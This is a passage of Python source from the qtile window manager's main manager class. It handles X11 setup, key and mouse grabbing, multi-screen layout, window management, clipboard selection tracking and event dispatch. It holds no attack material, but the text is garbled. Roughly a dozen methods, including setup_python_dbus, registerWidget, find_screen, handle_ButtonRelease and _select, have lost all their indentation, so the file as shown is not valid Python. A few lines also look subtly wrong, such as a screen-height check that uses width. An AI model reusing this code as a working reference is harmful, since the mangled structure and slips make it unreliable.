        nc = self.conn.keysym_to_keycode(xcbq.keysyms["Num_Lock"])
        self.numlockMask = xcbq.ModMasks[self.conn.get_modifier(nc)]
        self.validMask = ~(self.numlockMask | xcbq.ModMasks["lock"])
        # Because we only do Xinerama multi-screening,
        # we can assume that the first
        # screen's root is _the_ root.
        self.root = self.conn.default_screen.root
        self.root.set_attribute(
            eventmask=(
                EventMask.StructureNotify |
                EventMask.SubstructureNotify |
                EventMask.SubstructureRedirect |
                EventMask.EnterWindow |
                EventMask.LeaveWindow
            )
        )
        self.root.set_property(
            '_NET_SUPPORTED',
            [self.conn.atoms[x] for x in xcbq.SUPPORTED_ATOMS]
        )
        # EWMH: advertise ourselves via a dedicated supporting-WM-check
        # window pointed to from the root.
        self.supporting_wm_check_window = self.conn.create_window(-1, -1, 1, 1)
        self.root.set_property(
            '_NET_SUPPORTING_WM_CHECK',
            self.supporting_wm_check_window.wid
        )
        wmname = getattr(self.config, "wmname", "qtile")
        self.supporting_wm_check_window.set_property('_NET_WM_NAME', wmname)
        self.supporting_wm_check_window.set_property(
            '_NET_SUPPORTING_WM_CHECK',
            self.supporting_wm_check_window.wid
        )
        # user hook: config.main(qtile) runs before groups are built
        if config.main:
            config.main(self)
        self.dgroups = None
        if self.config.groups:
            key_binder = None
            if hasattr(self.config, 'dgroups_key_binder'):
                key_binder = self.config.dgroups_key_binder
            self.dgroups = DGroups(self, self.config.groups, key_binder)
        if hasattr(config, "widget_defaults") and config.widget_defaults:
            _Widget.global_defaults = config.widget_defaults
        else:
            _Widget.global_defaults = {}
        for i in self.groups:
            self.groupMap[i.name] = i
        self.currentScreen = None
        self.screens = []
        self._process_screens()
        self.currentScreen = self.screens[0]
        self._drag = None
        # X events deliberately ignored by the event loop.
        self.ignoreEvents = set([
            xcffib.xproto.KeyReleaseEvent,
            xcffib.xproto.ReparentNotifyEvent,
            xcffib.xproto.CreateNotifyEvent,
            # DWM handles this to help "broken focusing windows".
            xcffib.xproto.MapNotifyEvent,
            xcffib.xproto.LeaveNotifyEvent,
            xcffib.xproto.FocusOutEvent,
            xcffib.xproto.FocusInEvent,
            xcffib.xproto.NoExposureEvent
        ])
        self.setup_python_dbus()
        self.conn.flush()
        self.conn.xsync()
        self._xpoll()
        self.server = command._Server(self.fname, self, config)
        # Map and Grab keys
        for key in self.config.keys:
            self.mapKey(key)

        # It fixes problems with focus when clicking windows of some specific clients like xterm
        def noop(qtile):
            pass
        self.config.mouse += (Click([], "Button1", command.lazy.function(noop), focus="after"),)
        # button_code -> list of mouse bindings
        self.mouseMap = {}
        for i in self.config.mouse:
            if self.mouseMap.get(i.button_code) is None:
                self.mouseMap[i.button_code] = []
            self.mouseMap[i.button_code].append(i)
        self.grabMouse()
        # no_spawn is set when we are restarting; we only want to run the
        # startup hook once.
        if not no_spawn:
            hook.fire("startup_once")
        hook.fire("startup")
        self.scan()
        self.update_net_desktops()
        hook.subscribe.setgroup(self.update_net_desktops)
        # restore pickled state handed over across a restart
        if state:
            st = pickle.load(six.BytesIO(state.encode()))
            st.apply(self)
        self.selection = {
            "PRIMARY": {"owner": None, "selection": ""},
            "CLIPBOARD": {"owner": None, "selection": ""}
        }
        self.setup_selection()
    def setup_selection(self):
        """Track PRIMARY/CLIPBOARD ownership via a helper window and
        request the current selection contents."""
        PRIMARY = self.conn.atoms["PRIMARY"]
        CLIPBOARD = self.conn.atoms["CLIPBOARD"]
        self.selection_window = self.conn.create_window(-1, -1, 1, 1)
        self.selection_window.set_attribute(eventmask=EventMask.PropertyChange)
        # XFixes notifies us when either selection changes owner
        self.conn.xfixes.select_selection_input(self.selection_window,
                                                "PRIMARY")
        self.conn.xfixes.select_selection_input(self.selection_window,
                                                "CLIPBOARD")
        # record the current owners
        r = self.conn.conn.core.GetSelectionOwner(PRIMARY).reply()
        self.selection["PRIMARY"]["owner"] = r.owner
        r = self.conn.conn.core.GetSelectionOwner(CLIPBOARD).reply()
        self.selection["CLIPBOARD"]["owner"] = r.owner
        # ask for selection on startup
        self.convert_selection(PRIMARY)
        self.convert_selection(CLIPBOARD)
def setup_python_dbus(self):
# This is a little strange. python-dbus internally depends on gobject,
# so gobject's threads need to be running, and a gobject "main loop
# thread" needs to be spawned, but we try to let it only interact with
# us via calls to asyncio's call_soon_threadsafe.
try:
# We import dbus here to thrown an ImportError if it isn't
# available. Since the only reason we're running this thread is
# because of dbus, if dbus isn't around there's no need to run
# this thread.
import dbus # noqa
from gi.repository import GObject
GObject.threads_init()
def gobject_thread():
ctx = GObject.main_context_default()
while not self._eventloop.is_closed():
try:
ctx.iteration(True)
except Exception:
self.qtile.exception("got exception from gobject")
t = threading.Thread(target=gobject_thread, name="gobject_thread")
t.start()
except ImportError:
self.log.warning("importing dbus/gobject failed, dbus will not work.")
    def _process_fake_screens(self):
        """
        Since Xephyr, Xnest don't really support offset screens,
        we'll fake it here for testing, (or if you want to partition
        a physical monitor into separate screens)
        """
        for i, s in enumerate(self.config.fake_screens):
            # should have x,y, width and height set
            s._configure(self, i, s.x, s.y, s.width, s.height, self.groups[i])
            if not self.currentScreen:
                # first configured screen becomes the current one
                self.currentScreen = s
            self.screens.append(s)
    def _process_screens(self):
        """Build self.screens from Xinerama pseudoscreens (or fake screens),
        aliasing overlapping screens while preserving X's ordering."""
        if hasattr(self.config, 'fake_screens'):
            self._process_fake_screens()
            return
        # What's going on here is a little funny. What we really want is only
        # screens that don't overlap here; overlapping screens should see the
        # same parts of the root window (i.e. for people doing xrandr
        # --same-as). However, the order that X gives us psuedoscreens in is
        # important, because it indicates what people have chosen via xrandr
        # --primary or whatever. So we need to alias screens that should be
        # aliased, but preserve order as well. See #383.
        xywh = {}
        screenpos = []
        for s in self.conn.pseudoscreens:
            pos = (s.x, s.y)
            (w, h) = xywh.get(pos, (0, 0))
            if pos not in xywh:
                screenpos.append(pos)
            # keep the largest extent seen at this position
            xywh[pos] = (max(w, s.width), max(h, s.height))
        for i, (x, y) in enumerate(screenpos):
            (w, h) = xywh[(x, y)]
            # use a configured Screen if one exists for this index,
            # otherwise a default one
            if i + 1 > len(self.config.screens):
                scr = Screen()
            else:
                scr = self.config.screens[i]
            if not self.currentScreen:
                self.currentScreen = scr
            scr._configure(
                self,
                i,
                x,
                y,
                w,
                h,
                self.groups[i],
            )
            self.screens.append(scr)
        if not self.screens:
            # no pseudoscreens at all: fall back to one full-root screen
            if self.config.screens:
                s = self.config.screens[0]
            else:
                s = Screen()
            self.currentScreen = s
            s._configure(
                self,
                0, 0, 0,
                self.conn.default_screen.width_in_pixels,
                self.conn.default_screen.height_in_pixels,
                self.groups[0],
            )
            self.screens.append(s)
    def mapKey(self, key):
        """Register *key* in the key map and grab it on the root window,
        including numlock/capslock modifier variants."""
        self.keyMap[(key.keysym, key.modmask & self.validMask)] = key
        code = self.conn.keysym_to_keycode(key.keysym)
        self.root.grab_key(
            code,
            key.modmask,
            True,
            xcffib.xproto.GrabMode.Async,
            xcffib.xproto.GrabMode.Async,
        )
        if self.numlockMask:
            # also grab with numlock, and with numlock+capslock, so the
            # binding works regardless of lock-key state
            self.root.grab_key(
                code,
                key.modmask | self.numlockMask,
                True,
                xcffib.xproto.GrabMode.Async,
                xcffib.xproto.GrabMode.Async,
            )
            self.root.grab_key(
                code,
                key.modmask | self.numlockMask | xcbq.ModMasks["lock"],
                True,
                xcffib.xproto.GrabMode.Async,
                xcffib.xproto.GrabMode.Async,
            )
    def unmapKey(self, key):
        """Ungrab *key* (and its lock-modifier variants) and drop it from
        the key map; no-op if the key is not mapped."""
        key_index = (key.keysym, key.modmask & self.validMask)
        if key_index not in self.keyMap:
            return
        code = self.conn.keysym_to_keycode(key.keysym)
        self.root.ungrab_key(code, key.modmask)
        if self.numlockMask:
            # mirror the extra grabs installed by mapKey()
            self.root.ungrab_key(code, key.modmask | self.numlockMask)
            self.root.ungrab_key(
                code,
                key.modmask | self.numlockMask | xcbq.ModMasks["lock"]
            )
        del(self.keyMap[key_index])
    def update_net_desktops(self):
        """Publish EWMH desktop properties (count, names, current index)."""
        try:
            index = self.groups.index(self.currentGroup)
        # TODO: we should really only except ValueError here, AttributeError is
        # an annoying chicken and egg because we're accessing currentScreen
        # (via currentGroup), and when we set up the initial groups, there
        # aren't any screens yet. This can probably be changed when #475 is
        # fixed.
        except (ValueError, AttributeError):
            index = 0
        self.root.set_property("_NET_NUMBER_OF_DESKTOPS", len(self.groups))
        self.root.set_property(
            "_NET_DESKTOP_NAMES", "\0".join([i.name for i in self.groups])
        )
        self.root.set_property("_NET_CURRENT_DESKTOP", index)
    def addGroup(self, name, layout=None, layouts=None):
        """Create group *name* if it does not exist; return True if created.

        Fires "addgroup" and "changegroup" hooks and refreshes the EWMH
        desktop properties.
        """
        if name not in self.groupMap.keys():
            g = _Group(name, layout)
            self.groups.append(g)
            # Fall back to the globally configured layout list.
            if not layouts:
                layouts = self.config.layouts
            g._configure(layouts, self.config.floating_layout, self)
            self.groupMap[name] = g
            hook.fire("addgroup", self, name)
            hook.fire("changegroup")
            self.update_net_desktops()
            return True
        return False
    def delGroup(self, name):
        """Delete group *name*, moving its windows to another group.

        Raises ValueError when deleting would leave fewer groups than
        screens (every screen needs its own group).
        """
        # one group per screen is needed
        if len(self.groups) == len(self.screens):
            raise ValueError("Can't delete all groups.")
        if name in self.groupMap.keys():
            group = self.groupMap[name]
            # Prefer the group this screen showed previously as the target.
            if group.screen and group.screen.previous_group:
                target = group.screen.previous_group
            else:
                target = group.prevGroup()
            # Find a group that's not currently on a screen to bring to the
            # front. This will terminate because of our check above.
            while target.screen:
                target = target.prevGroup()
            for i in list(group.windows):
                i.togroup(target.name)
            if self.currentGroup.name == name:
                self.currentScreen.setGroup(target, save_prev=False)
            self.groups.remove(group)
            del(self.groupMap[name])
            hook.fire("delgroup", self, name)
            hook.fire("changegroup")
            self.update_net_desktops()
def registerWidget(self, w):
"""
Register a bar widget. If a widget with the same name already
exists, this will silently ignore that widget. However, this is
not necessarily a bug. By default a widget's name is just
self.__class__.lower(), so putting multiple widgets of the same
class will alias and one will be inaccessable. Since more than one
groupbox widget is useful when you have more than one screen, this
is a not uncommon occurrence. If you want to use the debug
info for widgets with the same name, set the name yourself.
"""
if w.name:
if w.name in self.widgetMap:
return
self.widgetMap[w.name] = w
    @utils.LRUCache(200)
    def colorPixel(self, name):
        """Resolve color *name* to an X pixel value (LRU-cached, 200 entries)."""
        return self.conn.screens[0].default_colormap.alloc_color(name).pixel
    @property
    def currentLayout(self):
        """The active layout of the current group."""
        return self.currentGroup.layout
    @property
    def currentGroup(self):
        """The group shown on the current screen."""
        return self.currentScreen.group
    @property
    def currentWindow(self):
        """The focused window of the current screen's group."""
        return self.currentScreen.group.currentWindow
    def scan(self):
        """Adopt pre-existing client windows found under the root window.

        Skips unmapped and withdrawn windows, and windows whose
        attributes can no longer be read (already destroyed).
        """
        _, _, children = self.root.query_tree()
        for item in children:
            try:
                attrs = item.get_attributes()
                state = item.get_wm_state()
            except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
                continue
            if attrs and attrs.map_state == xcffib.xproto.MapState.Unmapped:
                continue
            if state and state[0] == window.WithdrawnState:
                continue
            self.manage(item)
    def unmanage(self, win):
        """Forget the client for window id *win* and fire client_killed."""
        c = self.windowMap.get(win)
        if c:
            hook.fire("client_killed", c)
            # Give back any screen space the window's strut reserved.
            self.reset_gaps(c)
            if getattr(c, "group", None):
                c.group.remove(c)
            del self.windowMap[win]
            self.update_client_list()
    def reset_gaps(self, c):
        """Clear the screen gaps reserved by client *c*'s strut, if any."""
        if c.strut:
            self.update_gaps((0, 0, 0, 0), c.strut)
    def update_gaps(self, strut, old_strut=None):
        """Apply a window strut to the current screen's gaps.

        *strut* is (left, right, top, bottom) reserved pixel widths; a
        zero entry combined with a non-zero entry in *old_strut* clears
        the corresponding gap.
        NOTE(review): both the clearing and the setting chains use elif,
        so at most one edge is updated per call -- presumably struts here
        only ever reserve a single edge; confirm with callers.
        """
        from libqtile.bar import Gap
        (left, right, top, bottom) = strut[:4]
        if old_strut:
            (old_left, old_right, old_top, old_bottom) = old_strut[:4]
            if not left and old_left:
                self.currentScreen.left = None
            elif not right and old_right:
                self.currentScreen.right = None
            elif not top and old_top:
                self.currentScreen.top = None
            elif not bottom and old_bottom:
                self.currentScreen.bottom = None
        if top:
            self.currentScreen.top = Gap(top)
        elif bottom:
            self.currentScreen.bottom = Gap(bottom)
        elif left:
            self.currentScreen.left = Gap(left)
        elif right:
            self.currentScreen.right = Gap(right)
        self.currentScreen.resize()
    def manage(self, w):
        """Begin managing window *w*; return its client wrapper (or None).

        Qtile-internal windows become window.Internal; docks and windows
        with struts become static; other windows fire client_new and are
        added to the current group unless a hook already placed them.
        Returns None when the window has vanished or is
        override-redirect.
        """
        try:
            attrs = w.get_attributes()
            internal = w.get_property("QTILE_INTERNAL")
        except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
            return
        if attrs and attrs.override_redirect:
            return
        if w.wid not in self.windowMap:
            if internal:
                try:
                    c = window.Internal(w, self)
                except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
                    return
                self.windowMap[w.wid] = c
            else:
                try:
                    c = window.Window(w, self)
                except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
                    return
                if w.get_wm_type() == "dock" or c.strut:
                    c.static(self.currentScreen.index)
                else:
                    hook.fire("client_new", c)
                    # Window may be defunct because
                    # it's been declared static in hook.
                    if c.defunct:
                        return
                    self.windowMap[w.wid] = c
                    # Window may have been bound to a group in the hook.
                    if not c.group:
                        self.currentScreen.group.add(c, focus=c.can_steal_focus())
                    self.update_client_list()
                    hook.fire("client_managed", c)
            return c
        else:
            return self.windowMap[w.wid]
def update_client_list(self):
"""
Updates the client stack list
this is needed for third party tasklists
and drag and drop of tabs in chrome
"""
windows = [wid for wid, c in self.windowMap.items() if c.group]
self.root.set_property("_NET_CLIENT_LIST", windows)
# TODO: check stack order
self.root.set_property("_NET_CLIENT_LIST_STACKING", windows)
    def grabMouse(self):
        """Re-establish all mouse-button grabs from the config.

        Click bindings with focus use a synchronous ("freezing") grab so
        the press can be replayed to the target window after focusing;
        everything else grabs asynchronously.  As with keys, numlock and
        numlock+capslock variants are grabbed too.
        """
        self.root.ungrab_button(None, None)
        for i in self.config.mouse:
            if isinstance(i, Click) and i.focus:
                # Make a freezing grab on mouse button to gain focus
                # Event will propagate to target window
                grabmode = xcffib.xproto.GrabMode.Sync
            else:
                grabmode = xcffib.xproto.GrabMode.Async
            eventmask = EventMask.ButtonPress
            if isinstance(i, Drag):
                eventmask |= EventMask.ButtonRelease
            self.root.grab_button(
                i.button_code,
                i.modmask,
                True,
                eventmask,
                grabmode,
                xcffib.xproto.GrabMode.Async,
            )
            if self.numlockMask:
                self.root.grab_button(
                    i.button_code,
                    i.modmask | self.numlockMask,
                    True,
                    eventmask,
                    grabmode,
                    xcffib.xproto.GrabMode.Async,
                )
                self.root.grab_button(
                    i.button_code,
                    i.modmask | self.numlockMask | xcbq.ModMasks["lock"],
                    True,
                    eventmask,
                    grabmode,
                    xcffib.xproto.GrabMode.Async,
                )
def grabKeys(self):
self.root.ungrab_key(None, None)
for key in self.keyMap.values():
self.mapKey(key)
    def get_target_chain(self, ename, e):
        """
        Returns a chain of targets that can handle this event. The event
        will be passed to each target in turn for handling, until one of
        the handlers returns False or the end of the chain is reached.
        """
        chain = []
        handler = "handle_%s" % ename
        # Certain events expose the affected window id as an "event" attribute.
        eventEvents = [
            "EnterNotify",
            "ButtonPress",
            "ButtonRelease",
            "KeyPress",
        ]
        c = None
        if hasattr(e, "window"):
            c = self.windowMap.get(e.window)
        elif hasattr(e, "drawable"):
            c = self.windowMap.get(e.drawable)
        elif ename in eventEvents:
            c = self.windowMap.get(e.event)
        # The affected client's handler (if any) runs before Qtile's own.
        if c and hasattr(c, handler):
            chain.append(getattr(c, handler))
        if hasattr(self, handler):
            chain.append(getattr(self, handler))
        if not chain:
            self.log.info("Unknown event: %r" % ename)
        return chain
    def _xpoll(self):
        """Drain and dispatch all pending X events.

        Runs as the event-loop reader callback for the X connection's
        file descriptor.  A fatal X connection error disconnects; any
        other handler exception is logged and the loop continues.
        """
        while True:
            try:
                e = self.conn.conn.poll_for_event()
                if not e:
                    break
                # Strip the "Event" suffix to get the handler name stem.
                ename = e.__class__.__name__
                if ename.endswith("Event"):
                    ename = ename[:-5]
                if e.__class__ not in self.ignoreEvents:
                    self.log.debug(ename)
                    for h in self.get_target_chain(ename, e):
                        self.log.info("Handling: %s" % ename)
                        r = h(e)
                        # A falsy return stops the handler chain.
                        if not r:
                            break
            except Exception as e:
                error_code = self.conn.conn.has_error()
                if error_code:
                    error_string = xcbq.XCB_CONN_ERRORS[error_code]
                    self.log.exception("Shutting down due to X connection error %s (%s)" %
                                       (error_string, error_code))
                    self.conn.disconnect()
                self.log.exception("Got an exception in poll loop")
        # Any changes these events triggered should be flushed to the server.
        try:
            self.conn.flush()
        # Catch some bad X exceptions. Since X is event based, race
        # conditions can occur almost anywhere in the code. For
        # example, if a window is created and then immediately
        # destroyed (before the event handler is evoked), when the
        # event handler tries to examine the window properties, it
        # will throw a WindowError exception. We can essentially
        # ignore it, since the window is already dead and we've got
        # another event in the queue notifying us to clean it up.
        #
        # We have to catch these here, because when we .flush() is when xcb
        # reports checked exceptions.
        except (WindowError, AccessError, DrawableError):
            pass
    def loop(self):
        """Run the main event loop until SIGINT/SIGTERM or cmd_shutdown.

        Starts the command server, installs signal handlers, and polls
        the X connection's file descriptor; tears everything down on
        exit.
        """
        self.server.start()
        self._eventloop.add_signal_handler(signal.SIGINT, self._eventloop.stop)
        self._eventloop.add_signal_handler(signal.SIGTERM, self._eventloop.stop)
        self._eventloop.set_exception_handler(
            lambda x, y: self.log.exception("Got an exception in poll loop"))
        self.log.info('Adding io watch')
        fd = self.conn.conn.get_file_descriptor()
        self._eventloop.add_reader(fd, self._xpoll)
        try:
            self._eventloop.run_forever()
        finally:
            self.server.close()
            self.log.info('Removing io watch')
            self._eventloop.remove_reader(fd)
            self._eventloop.close()
            self.conn.conn.disconnect()
        # NOTE(review): presumably this nudges any glib integration so
        # pending GObject callbacks run and it can exit cleanly; confirm.
        try:
            from gi.repository import GObject
            GObject.idle_add(lambda: None)
        except ImportError:
            pass
def find_screen(self, x, y):
"""
Find a screen based on the x and y offset.
"""
result = []
for i in self.screens:
if x >= i.x and x <= i.x + i.width and \
y >= i.y and y <= i.y + i.height:
result.append(i)
if len(result) == 1:
return result[0]
return None
def find_closest_screen(self, x, y):
"""
If find_screen returns None, then this basically extends a
screen vertically and horizontally and see if x,y lies in the
band.
Only works if it can find a SINGLE closest screen, else we
revert to _find_closest_closest.
Useful when dragging a window out of a screen onto another but
having leftmost corner above viewport.
"""
normal = self.find_screen(x, y)
if normal is not None:
return normal
x_match = []
y_match = []
for i in self.screens:
if x >= i.x and x <= i.x + i.width:
x_match.append(i)
if y >= i.y and y <= i.y + i.height:
y_match.append(i)
if len(x_match) == 1:
return x_match[0]
if len(y_match) == 1:
return y_match[0]
return self._find_closest_closest(x, y, x_match + y_match)
def _find_closest_closest(self, x, y, candidate_screens):
"""
if find_closest_screen can't determine one, we've got multiple
screens, so figure out who is closer. We'll calculate using
the square of the distance from the center of a screen.
Note that this could return None if x, y is right/below all
screens (shouldn't happen but we don't do anything about it
here other than returning None)
"""
closest_distance = None
closest_screen = None
if not candidate_screens:
# try all screens
candidate_screens = self.screens
# if left corner is below and right of screen
# it can't really be a candidate
candidate_screens = [
s for s in candidate_screens
if x < s.x + s.width and y < s.y + s.width
]
for s in candidate_screens:
middle_x = s.x + s.width / 2
middle_y = s.y + s.height / 2
distance = (x - middle_x) ** 2 + (y - middle_y) ** 2
if closest_distance is None or distance < closest_distance:
closest_distance = distance
closest_screen = s
return closest_screen
    def handle_SelectionNotify(self, e):
        """Track a new selection owner and request its contents."""
        if not getattr(e, "owner", None):
            return
        name = self.conn.atoms.get_name(e.selection)
        self.selection[name]["owner"] = e.owner
        self.selection[name]["selection"] = ""
        # Ask the owner to deliver the selection to our window; the data
        # arrives later as a PropertyNotify (see handle_PropertyNotify).
        self.convert_selection(e.selection)
        hook.fire("selection_notify", name, self.selection[name])
    def convert_selection(self, selection, _type="UTF8_STRING"):
        """Ask X to convert *selection* to *_type* onto our selection window."""
        TYPE = self.conn.atoms[_type]
        self.conn.conn.core.ConvertSelection(self.selection_window.wid,
                                             selection,
                                             TYPE, selection,
                                             xcffib.CurrentTime)
    def handle_PropertyNotify(self, e):
        """Pick up selection contents delivered to our selection window."""
        name = self.conn.atoms.get_name(e.atom)
        # it's the selection property
        if name in ("PRIMARY", "CLIPBOARD"):
            assert e.window == self.selection_window.wid
            prop = self.selection_window.get_property(e.atom, "UTF8_STRING")
            # If the selection property is None, it is unset, which means the
            # clipboard is empty.
            value = prop and prop.value.to_utf8() or six.u("")
            self.selection[name]["selection"] = value
            hook.fire("selection_change", name, self.selection[name])
    def handle_EnterNotify(self, e):
        """Switch the current screen when the pointer enters another one."""
        # Managed windows handle their own enter events; let the client
        # handler (which ran first in the chain) deal with those.
        if e.event in self.windowMap:
            return True
        s = self.find_screen(e.root_x, e.root_y)
        if s:
            self.toScreen(s.index)
    def handle_ClientMessage(self, event):
        """Handle EWMH client messages (currently only _NET_CURRENT_DESKTOP)."""
        atoms = self.conn.atoms
        opcode = event.type
        data = event.data
        # handle change of desktop
        if atoms["_NET_CURRENT_DESKTOP"] == opcode:
            index = data.data32[0]
            try:
                self.currentScreen.setGroup(self.groups[index])
            except IndexError:
                self.log.info("Invalid Desktop Index: %s" % index)
    def handle_KeyPress(self, e):
        """Dispatch a grabbed key press to the commands bound to it."""
        keysym = self.conn.code_to_syms[e.detail][0]
        state = e.state
        # Normalize the numlock bit so lookups match mapKey's key.
        if self.numlockMask:
            state = e.state | self.numlockMask
        k = self.keyMap.get((keysym, state & self.validMask))
        if not k:
            self.log.info("Ignoring unknown keysym: %s" % keysym)
            return
        for i in k.commands:
            if i.check(self):
                status, val = self.server.call(
                    (i.selectors, i.name, i.args, i.kwargs)
                )
                if status in (command.ERROR, command.EXCEPTION):
                    self.log.error("KB command error %s: %s" % (i.name, val))
            else:
                return
    def cmd_focus_by_click(self, e):
        """Focus the window under a click event *e*.

        With bring_front_click set in the config, the clicked window is
        also raised to the top of the stacking order.
        """
        wnd = e.child or e.root
        # Additional option for config.py
        # Brings clicked window to front
        if self.config.bring_front_click:
            self.conn.conn.core.ConfigureWindow(
                wnd,
                xcffib.xproto.ConfigWindow.StackMode,
                [xcffib.xproto.StackMode.Above]
            )
        if self.windowMap.get(wnd):
            self.currentGroup.focus(self.windowMap.get(wnd), False)
            self.windowMap.get(wnd).focus(False)
        # Replay the frozen pointer event to the client (see grabMouse's
        # synchronous grab for focusing Click bindings).
        self.conn.conn.core.AllowEvents(xcffib.xproto.Allow.ReplayPointer, e.time)
        self.conn.conn.flush()
    def handle_ButtonPress(self, e):
        """Dispatch a grabbed button press to its Click/Drag bindings.

        NOTE(review): mouseMap.get() returns None for an unbound button
        code, which would make the for-loop raise TypeError -- presumably
        only grabbed (bound) buttons ever arrive here; confirm.
        """
        button_code = e.detail
        state = e.state
        if self.numlockMask:
            state = e.state | self.numlockMask
        k = self.mouseMap.get(button_code)
        for m in k:
            if not m or m.modmask & self.validMask != state & self.validMask:
                self.log.info("Ignoring unknown button: %s" % button_code)
                continue
            if isinstance(m, Click):
                for i in m.commands:
                    if i.check(self):
                        if m.focus == "before":
                            self.cmd_focus_by_click(e)
                        status, val = self.server.call(
                            (i.selectors, i.name, i.args, i.kwargs))
                        if m.focus == "after":
                            self.cmd_focus_by_click(e)
                        if status in (command.ERROR, command.EXCEPTION):
                            self.log.error(
                                "Mouse command error %s: %s" % (i.name, val)
                            )
            elif isinstance(m, Drag):
                x = e.event_x
                y = e.event_y
                if m.start:
                    i = m.start
                    if m.focus == "before":
                        self.cmd_focus_by_click(e)
                    status, val = self.server.call(
                        (i.selectors, i.name, i.args, i.kwargs))
                    if status in (command.ERROR, command.EXCEPTION):
                        self.log.error(
                            "Mouse command error %s: %s" % (i.name, val)
                        )
                        continue
                else:
                    val = (0, 0)
                if m.focus == "after":
                    self.cmd_focus_by_click(e)
                # Remember the press origin and the start command's result
                # so handle_MotionNotify can compute drag deltas.
                self._drag = (x, y, val[0], val[1], m.commands)
                self.root.grab_pointer(
                    True,
                    xcbq.ButtonMotionMask |
                    xcbq.AllButtonsMask |
                    xcbq.ButtonReleaseMask,
                    xcffib.xproto.GrabMode.Async,
                    xcffib.xproto.GrabMode.Async,
                )
def handle_ButtonRelease(self, e):
button_code = e.detail
state = e.state & ~xcbq.AllButtonsMask
if self.numlockMask:
state = state | self.numlockMask
k = self.mouseMap.get(button_code)
for m in k:
if not m:
self.log.info(
"Ignoring unknown button release: %s" % button_code
)
continue
if isinstance(m, Drag):
self._drag = None
self.root.ungrab_pointer()
    def handle_MotionNotify(self, e):
        """Drive an in-progress Drag binding from pointer motion."""
        if self._drag is None:
            return
        # Origin of the press plus the start command's returned values.
        ox, oy, rx, ry, cmd = self._drag
        dx = e.event_x - ox
        dy = e.event_y - oy
        if dx or dy:
            for i in cmd:
                if i.check(self):
                    # Commands receive the offset position and the raw
                    # pointer coordinates appended to their args.
                    status, val = self.server.call((
                        i.selectors,
                        i.name,
                        i.args + (rx + dx, ry + dy, e.event_x, e.event_y),
                        i.kwargs
                    ))
                    if status in (command.ERROR, command.EXCEPTION):
                        self.log.error(
                            "Mouse command error %s: %s" % (i.name, val)
                        )
    def handle_ConfigureNotify(self, e):
        """
        Handle xrandr events.
        """
        # NOTE(review): this only resizes when *both* dimensions differ
        # from the current screen's -- a single-axis change is ignored;
        # confirm whether that is intentional.
        screen = self.currentScreen
        if e.window == self.root.wid and \
                e.width != screen.width and \
                e.height != screen.height:
            screen.resize(0, 0, e.width, e.height)
def handle_ConfigureRequest(self, e):
# It's not managed, or not mapped, so we just obey it.
cw = xcffib.xproto.ConfigWindow
args = {}
if e.value_mask & cw.X:
args["x"] = max(e.x, 0)
if e.value_mask & cw.Y:
args["y"] = max(e.y, 0)
if e.value_mask & cw.Height:
args["height"] = max(e.height, 0)
if e.value_mask & cw.Width:
args["width"] = max(e.width, 0)
if e.value_mask & cw.BorderWidth:
args["borderwidth"] = max(e.border_width, 0)
w = xcbq.Window(self.conn, e.window)
w.configure(**args)
    def handle_MappingNotify(self, e):
        """Refresh the keymap after a mapping change; re-grab keyboard keys."""
        self.conn.refresh_keymap()
        if e.request == xcffib.xproto.Mapping.Keyboard:
            self.grabKeys()
    def handle_MapRequest(self, e):
        """Manage a window that asked to be mapped, then map it if visible."""
        w = xcbq.Window(self.conn, e.window)
        c = self.manage(w)
        # Don't map windows whose group isn't shown on any screen.
        if c and (not c.group or not c.group.screen):
            return
        w.map()
    def handle_DestroyNotify(self, e):
        """Drop the client whose window was destroyed."""
        self.unmanage(e.window)
    def handle_UnmapNotify(self, e):
        """Withdraw and unmanage a window that was unmapped."""
        if e.event != self.root.wid:
            c = self.windowMap.get(e.window)
            if c and getattr(c, "group", None):
                try:
                    c.window.unmap()
                    c.state = window.WithdrawnState
                except xcffib.xproto.WindowError:
                    # This means that the window has probably been destroyed,
                    # but we haven't yet seen the DestroyNotify (it is likely
                    # next in the queue). So, we just let these errors pass
                    # since the window is dead.
                    pass
        self.unmanage(e.window)
    def handle_ScreenChangeNotify(self, e):
        """Forward xrandr screen-change events to the hook system."""
        hook.fire("screen_change", self, e)
def toScreen(self, n, warp=True):
"""
Have Qtile move to screen and put focus there
"""
if len(self.screens) < n - 1:
return
old = self.currentScreen
self.currentScreen = self.screens[n]
if old != self.currentScreen:
hook.fire("current_screen_change")
self.currentGroup.focus(self.currentWindow, warp)
def moveToGroup(self, group):
"""
Create a group if it doesn't exist and move a windows there
"""
if self.currentWindow and group:
self.addGroup(group)
self.currentWindow.togroup(group)
def _items(self, name):
if name == "group":
return True, list(self.groupMap.keys())
elif name == "layout":
return True, list(range(len(self.currentGroup.layouts)))
elif name == "widget":
return False, list(self.widgetMap.keys())
elif name == "bar":
return False, [x.position for x in self.currentScreen.gaps]
elif name == "window":
return True, self.listWID()
elif name == "screen":
return True, list(range(len(self.screens)))
def _select(self, name, sel):
if name == "group":
if sel is None:
return self.currentGroup
else:
return self.groupMap.get(sel)
elif name == "layout":
if sel is None:
return self.currentGroup.layout
else:
return utils.lget(self.currentGroup.layouts, sel)
elif name == "widget":
return self.widgetMap.get(sel)
elif name == "bar":
return getattr(self.currentScreen, sel)
elif name == "window":
if sel is None:
return self.currentWindow
else:
return self.clientFromWID(sel)
elif name == "screen":
if sel is None:
return self.currentScreen
else:
return utils.lget(self.screens, sel)
def listWID(self):
return [i.window.wid for i in self.windowMap.values()]
def clientFromWID(self, wid):
for i in self.windowMap.values():
if i.window.wid == wid:
return i
return None
    def call_soon(self, func, *args):
        """ A wrapper for the event loop's call_soon which also flushes the X
        event queue to the server after func is called. """
        def f():
            func(*args)
            # Push any X requests func queued out to the server now.
            self.conn.flush()
        self._eventloop.call_soon(f)
    def call_soon_threadsafe(self, func, *args):
        """ Another event loop proxy, see `call_soon`. """
        def f():
            func(*args)
            # Flush runs on the loop thread, after func.
            self.conn.flush()
        self._eventloop.call_soon_threadsafe(f)
    def call_later(self, delay, func, *args):
        """ Another event loop proxy, see `call_soon`. """
        def f():
            func(*args)
            # Flush any X requests func queued once it has run.
            self.conn.flush()
        self._eventloop.call_later(delay, f)
    def run_in_executor(self, func, *args):
        """ A wrapper for running a function in the event loop's default
        executor. """
        # Returns a future; no X flush here since func runs off-loop.
        return self._eventloop.run_in_executor(None, func, *args)
    def cmd_debug(self):
        """Set the log level to DEBUG."""
